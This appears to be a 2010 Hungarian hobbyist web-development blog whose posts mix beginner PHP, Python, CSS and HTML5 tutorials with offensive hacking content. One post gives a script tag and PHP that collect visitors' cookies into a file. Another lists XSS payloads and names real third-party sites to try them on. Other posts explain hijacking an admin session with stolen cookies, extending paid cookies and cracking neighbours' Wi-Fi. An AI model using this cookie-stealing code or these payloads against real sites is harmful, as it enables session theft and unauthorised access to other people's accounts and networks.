HTML

Minden ami web!!!

Ide irok mindent ami web html,css,php,python,javascript meg sok minden más .....

Friss topikok

  • Kacagóember: Szar (2016.12.10. 15:54) Wi-Fi hack

Php kapcsolódás adatbázishoz

drext0r 2010.09.13. 17:47

 Ugyanazt irom le most mint előzöleg pythonban csatlakozok egy mysql adatbázishoz majd létrehozok egy adatbázist:

kapcsolódás:

<?php
$kapcs = mysql_connect("localhost","user","passwd");
if (!$kapcs)
  {
  die('Sikertelen kapcsolódás: ' . mysql_error());
  }



mysql_close($kapcs);
?>

adatbázis létrehozása:

<?php
$kapcs = mysql_connect("localhost","user","passwd");
if (!$kapcs)
  {
  die('Sikertelen kapcsolódás: ' . mysql_error());
  }

if (mysql_query("CREATE DATABASE my_db",$con))
  {
  echo "Adatbázis létrehozva";
  }
else
  {
  echo "Az adatbázist nem sikerült létrehozni: " . mysql_error();
  }

mysql_close($kapcs);
?>


Szólj hozzá!

Python kapcsolódás mysql adatbázishoz

drext0r 2010.09.13. 17:38

Na a python nyelvből egyenlőre csak kódokat fogok irniam aki szeretné megtanulni a pythont annak ajánlom annak a gerárd swinnen vagy kinek a könyvét én is abból tanultam meg XD

na szal kapcsolódás pythonnal mysql adatbázishoz:

import MySQLdb

myDB = MySQLdb.connect ([host=[,port= [,user=[,passwd=[,db=]]]]])

cHandler = myDB.cursor()

 

host=gazdagép port=kapu user=fekhasználó passwd=jelszó db=adatbázisnév

Adatbázis tábla létrehozása:

import MySQLdb

myDB = MySQLdb.connect(ezt az elöbb leirtam)

cHandler = myDB.cursor()

cHandler.execute("CREATE DATABASE akarmi")

cHandler.execute("CREATE TABLE Arrivals (city

TEXT, \

flight TEXT, time TEXT) " )

 

 

Szólj hozzá!

Egy kis infó a javascriptről

drext0r 2010.09.13. 17:22

 A JavaScript egy webes nyelv amivel sok mindent lehet csinálni lényegében hasonlit a php-ra de nagy különbségük hogy az egyik a szerveren fut le a másik pedig a böngészőbe igy a javascript böngészőfüggő a php viszont nem a php annyiban jobb még hogy (nekem jobban tetszik) és nem látszik a weblap forráskódjában a php kód a javascripté pedig igen és ez szar.Mert akárki ellophatja a mi nehezen megirt kódunkat viszont amit nem látnak azt nem tudják ellopni :)

A javascriptről is biztos lehet a neten pár ezer leirást találni de azért én is irok pár dolgot ...a javascriptet a html kódbn szinte mindenhova be lehet rakni igy:<script type="text/javascript">alert("Üdv a weboldalamon");</script> hát igy ha vki ugy tudná hogy a type helyett language-t kell használni akkor sztem felejtse el .....

A Java és a JavaScript nyelvnek egyáltalán semmi közük nincs egymással a Java egy rohadt nehéz nyelv és nem éppen a webre találták ki bár oda is lehet vele fejleszteni a javascript meg egy könnyű nyelv ami csak webre van ÉRTHETŐ???

Na egyenlőre ennyi a neten ha a gúgliba beirja vki hogy javascript programozás biztos talál magának valót ha nem igy járt...

Szólj hozzá!

Html 5 video

drext0r 2010.09.13. 17:10

 Nos itt bemutatom hogy hogy lehet videót beilleszteni weblapunkba html5-el...

html5 code:

<!DOCTYPE HTML>
<html>
<body>

<video width="320" height="240" controls="controls">
  <source src="movie.ogg" type="video/ogg" />
  <source src="movie.mp4" type="video/mp4" />
Az ön böngészője nem támogatja a video taget.
</video>

</body>
</html>

Azt hiszem érthető és szerintem tök jó XDXD...

Címkék: html video 5 html5

Szólj hozzá!

Javascript Xss I

drext0r 2010.09.13. 16:57

 javascript:<script type="javascript" src="http://ateweblapod.hu/cookiejar.php"></script>

 

php: <?php

 
if(!is_array($_COOKIE)) die();
 
foreach($_COOKIE as $cookie_name => $cookie_value)
 
    file_put_contents('cookiejar.txt',
 
                         $cookie_name.':'.$cookie_value."\n",
 
                         FILE_APPEND);
?>
 

Szólj hozzá!

Css 1.rész

drext0r 2010.09.12. 19:35

Jöjjön egy kis CSS a css kódokat lehelyezhetjük a html kódban vagy hivatkozhatunk rá bemutatom mind a két példát:

Benne van a html kódban:

<html>

<head>

<style type="text/css"> //megadom hogy a kód css

body {

background-color: #000000;  a hátteret feketére állitom

}

</head>

és itt van egy példa arra ha hivatkozunk rá

<html>

<head>

<link type="text/css" rel="stylesheet" href="pelda.css">

</head>

ilyenkor egy külön css fájlba kell a kódot irni  css-ben megjegyzéseket igy lehet tenii /*ez itt megjegyzés*/

az utasitások végére mindig pontosvesszőt kell rakni (;)

Háttérnek vagy képet vagy szint lehet megadni a szinben nincs seemi különösebb beállitás :background-color: #000000; 

háttérképnél már állitgathatunk XD

background-image:url("pelda.jpg");

background-position: right top;

background-repeat: no-repeat;

background-attachment: scroll;

magyarázat: az első sorban megadom a a képet a második sorban beállitottam az elhelyezkedés helyét (jobb felül) további értékek:(top left, top center, top right, center left, center center, center right,bottom left, bottom center, bottom right) a harmadik sorban a kép ismétlődeés arra van beállitva hogy ne ismétlődjön további értékek:(repeat, repeat-x, repeat-y,no-repeat) a negyedik sorban pedig azt hogy a kép görgetésre mozogjon ez a scroll ha azt akarjuk hogy nem mozogjon akkor pedig fixed...

Szöveg formázás:

h1 {

font-size: 30px;

color: #000000;

text-align: center;

text-decoration: none;

}

1 sor: 30pixeles-re állitom a méretet

2 sor: egyértelmű

3 sor: középre igazitottam a szöveget

4 sor : nem kell dekoráció

Remélem érthető volt :) ha nem irj .....

Szólj hozzá!

Webfejlesztés I

drext0r 2010.09.12. 19:34

A webfejlesztéshez kötelező nyelv a HTML (Hypertext Markup Language magyarul hiperszöveges jelölőnyelv . A html alapjaival nem nagyon fogok foglalkozni mert rengeteg leirás van róla a neten -->google hanem inkább a CSS (Cascading Style Sheets) ezzel a nyelvel lehet disziteni a html tartalmat ás megspórolni egy csomó időt ezeken kivűl még jobban fogok foglalkozni a javascript vbscript php perl ruby python nyelvekkel ezeket majd késöbb részletezem...
Én "6" programynelvet tudok:HTML, CSS, JavaScript, Php,Python VRML.
A php-vel még hadilábon állok de lassan azt is megtanulom látható hogy ezek közül a nyelvek közül szinte mindegyik webes nyelv kivéve a VRML az grafikai...
 

Szólj hozzá!

Helyesírás

drext0r 2010.09.12. 19:33

A helyesírásért bocs nem tok irni XD azért remélem érthető .... 

Szólj hozzá!

Css 1

drext0r 2010.09.12. 19:27

Na irok egy kis css-t is aki nem tudná ez a css hát nem mondható programnyelvnek inkább diszitőnyelvnek na szal ezzel lehet kidisziteni a html kódokat és erről fogok irni....

Szólj hozzá!

Wi-Fi hack

drext0r 2010.08.14. 11:44

 Sokakat érdekli hogy hogyan lehetne a szomszéd wifijét használni...XDXD 

Amikor bontjuk a saját wifi kapcsolatunkat akkor a wifi kilistázza az elérhető hálózatokat amin vagy van jelszó vagy nincs ha nincs simán lehet csatlakozni ha van akkor valamilyen programmal vagy visszafejtjük vagy kitaláljuk.De lehet hogy az a jelszó (általában igy van) wpa wep wpa2-vel vannak titkositva.Ma már ezeket a titkositásokat is fel lehet törni méghozzá egy orosz szoftvercég legújabb szoftverével ami ezt a folyamatot fel is gyorsitja.Ez a szoftver elérhető a www.elcomsoft.com/download.html cimről.Találtam még egy ilyen wifi feltörő micsodát de ez csak linuxokon müxik ...www.remote-exploit.org azt hiszem ezen a cimen van...

1 komment

Cookie gonosz felhasználása

drext0r 2010.08.14. 01:40

Remélem mindenki tudja hogy mik azok a cookiek ha jobban tetszik sütik ha nem tudnám akk figyelj :sütik egyfajta azonositok amit a weblapok a mi gépünkön lementik hogy késöbba weblap tudja hogy mi már jártunk ott .De ezeket a cookiekat lehet rossz dologra is használni ha pl az most nem irom le hogy hogyan xss-el ki tudod csalni egy weblap adminjának a sütijeit akkor beilleszted a sajátod helyére és elvileg jelszó nélkül beléphetsz.Mozzilába én ugy tudom nem nagyon lehet megváltoztatni a cookiekat én az opera legújabb verzióját használom és itt meglehet változtatni egyszerűen(Menü-->Beállitások-->Beállitások-->Haladó-->Sütik-->Sütik kezelése ha eddig nem töröltük akkor az eddigi összes weblap sütije ott van van.Ezeknek a sütiknek van egy azonositójuk és egy csomó valami ami vmi gubancolódott kód és van egy lejárati ideje.Ha pl: egy letöltő oldalon előfizetünk 1 napra akkor kapunk egy olyan sütit ami egy napig érvényes ha elég ügyesek vagyunk azt az egy napot akár 35 évre is meghosszabithatjuk....

Szólj hozzá!

Exploitok

drext0r 2010.08.14. 01:32

Ide irok pár oldalt amik tele vannak exploitokkal....

www.inj3ct0r.com

www.exploit-db.com

Ahogy találok még bővitem a listát ... 

Szólj hozzá!

Xss

drext0r 2010.08.14. 01:22

c Az xss-hez szerintem viszonylag  ismerni kell a html,javascript nyelveket.Ha valaki ráakadna egy ilyen oldalra amiből nem kevés van akkor nem csak a szokásos <script type="text/javascript">alert('Xss by Drext0r');</script> hanem html css kódokat is be lehet irni ami szerintem igen jó szórakozás...XDXD ha valaki kisérletezni akarna ezekkel a kódokkal akkor itt van pár oldal ahol működnek nem perzisztens szal nem marad bent a kód de gyakorlásra tökéletesek....

www.polc.hu

www.nlcafe.hu

és itt van pár kód :

javascript:"><script type="text/javascript">alert('Xss by:Drextor');</script>

             "><script type="text/javascript">alert(document.cookie);</script>

html:<marquee><font color=Blue size=15>Hahahahaha</font></marquee> 

css:<style type="text/css"> body { background-color: red; } </style>
 

 

Az első két javascript kód annyit tesz hogy kiirják a cookiekat és azt hogy xss by Drext0r a html kód futó szövegként valahova beszúrja a hahahahaha szöveget a css pedig a hátteret pirosra változtatja...ja és ha a kód nem működne akk kisérletezni kell a "> jellel valahol kell vhol nem...

jó szórakozást....

 

Szólj hozzá!

Xss alap

drext0r 2010.08.13. 22:39

 Na itt van egy alap leirás az xss-ről nem én irtam mert lusta voltam leirni de itt van és kész 

(a leirás a www.webmania.cc-ről származik)

 

Mi az XSS?

Az XSS olyan támadási technika amellyel egy weboldal veszélyes kódot jelenít meg, amit a browser lefuttat. A támadás a kliens ellen irányul nem a szerver ellen, és maga a weblap ami hordozza az xss támadásra alkalmas kódot a támadásnak nem a célpontja, hanem annak eszköze. Akkor miért is kell ezzel foglalkoznunk? Azért mert ha alkalmazásunk xss szempontból sebezhető, akkor ki fogják ezt használni ami semmi esetre sem kedvező.
Hogyan kerül a weblapra a veszélyes kód?

A veszélyes kód odakerülhet úgy, hogy maga a weblap készítője szánt szándékkal kiteszi. Bejuthat egy nem biztosított formon keresztül, a weblap publikus részébe való rögzítéssel, illetve egy olyan linkre kattintással ami kivált egy xss támadást.
Mit lehet XSS-sel véghezvinni?

Xss-sel loptak már hitelkártya adatokat, sessiont, felhasználói jelszavakat, tettek működésképtelenné vagy elérhetetlenné teljes oldalakat.
A leghíresebb és legnagyobb XSS támadást egy egyetemista fiú indította útjára. Eredeti célja az volt, hogy a barátnője MySapce oldalába belehekkelje magát vagyis, hogy megjelenítse az oldalán, hogy “Samy az én hősöm”. Aztán kis gondolkodás után rájött, hogy ha kicsit módosítja a scriptjét akkor nem csak a barátnőjénél fog a kedves kis felirat megjelenni, hanem minden MySpace usernál aki megnézi az ő adatlapját. Elindította a férget és úgy kalkulált, hogy 1 hónap alatt 2 embert fertőz majd meg, 2 hónap alatt 4-et és így tovább exponenciálisan növekedve. Kissé elszámította magát, mert 8 óra alatt 200 felhasználóhoz jutott el a féreg, 12 óra alatt 9.000-hez míg 18 óra múltán a fertőzött userek száma túllépte az 1 milliót, ami végül a MySpace szervereit kegyetlenül túlterhelte és két vállra fektette. Amikor Samy rájött, hogy ő okozta a leállást írt egy levelet a MySpace-nek, hogy bocs, véletlen volt és így lehet kijavítani. Persze a Myspace épp el volt foglalva a probléma javításán samy levelével nem foglalkoztak és elég sokáig tartott nekik talpraállítani a szolgáltatást. Egy szerver leállással elég nagy anyagi kárt lehet okozni, de gondolom ezt senkinek sem kell magyarázgatni. Samy összes elérhetősége kint volt az adatlapján, de ennek ellenére eltartott egy ideig míg az FBI valahogy megtalálta és falhoz állította.
Hogyan néz ki egy XSS támadás?

Az XSS támadásoknak nagyon sokféle megjelenése lehet, de lényegében mindegyik valamiféle scriptet próbál bejuttatni az oldalunkba. Tegyük fel, hogy van egy kereséshez használt input mezőnk az oldalunkon. Általában a találatokat megjelenítő oldal kiírja a kifejezést amire kerestünk. A wordpress például annyit csinál, hogy a találati oldalon a kereső inputba automatikusan beleírja a megadott keresési kifejezést. Ha megnézzük az oldal forrását azután, hogy rákerestünk a goranga szóra akkor ezt fogjuk találni:
<input type="text" id="s" name="s" value="goranga" />

Namármost, ha a keresési mezőbe az alábbi kódot írjuk be akkor érdekes dolgokra juthatunk.
"><script type="text/javascript">alert('xss');</script>

Az első két karakter "> arról gondoskodik, hogy az input elemünk le legyen zárva, az ezt követő rész pedig egy egyszerű script ami ha lefut akkor már találtunk is egy XSS támadási pontot.
Szerencsére a wordpress szűri a bejövő adatokat és konvertálja a veszélyes karaktereket azok html entitásává, de más rendszerekben benne maradhatnak ehhez hasonló XSS lyukak.

Persze nem csak a keresési mezők, hanem mindenféle input mező, url változó megtámadható így ami később a html oldalon megjelenítésre kerül. Persze egy alert ablak habár bosszantó ugyan, de még nem fenyeget különösebb veszéllyel, de ha jobba belegondolunk, akkor éppenséggel bármilyen JavaScript kódot megadhatnánk itt. Például egy location.href-fel átirányíthatnánk a usert egy másik oldalra úgy, hogy a webhelyhez tartozó cookie-kat hozzáfűznék a meghívott url-hez. Ha mindenzt mondjuk egy olyan oldalon tesszük ahol be kell jelentkezni, akkor jó eséllyel már meg is vannak az áldozat bejelentkezési adatai. Ha történetesen a keresési kifejezés GET metódussal adódik át a szervernek és így megjelenik az url-ben is, akkor máris készíthetünk egy linket, ami tartalmazza az XSS támadásra szolgáló kódot, és ezt a linket már elküldhetjük bárkinek és már szépen gyűlnek is ármánykodó kezeink között a bizalmas adatok.
Hogyan védekezzünk az XSS ellen?

Minden usertől érkező adatot tisztogatni kell felhasználás előtt még a kliens oldalon. A fehérlistás szűrés a legideálisabb megoldás, azaz mivel tudjuk, hogy milyen bejövő adatot várunk a beérkezett adatot mondjuk egy reguláris kifejezés illesztéssel vizsgálunk. Persze ezután szerver oldalon is kell újra tisztogatni.

A böngészők alapvetően a same origin policy-val védekeznek (azonos származási forrás). Ez annyit tesz, hogy a a http://mashol.hu/index.html fileból meghívott http://valahol.hu/xss.js script nem fog hozzáférni a mashol.hu domain cookie információihoz. Ez sok esetben elég jó védelmet ad, de amint a fenti példából is láthatjuk nem hagyhatjuk ezt a biztonsági kockázatot egy az egyben a böngészőre, hanem nekünk magunknak is foglalkoznunk kell vele.
 

Szólj hozzá!

Kezdés

drext0r 2010.08.13. 22:35

  Na elinditom a blogomat amiben főként az xss sebezhetőségekről lesz szó de megeshet hogy másról is irok ......XDXD

Szólj hozzá!

süti beállítások módosítása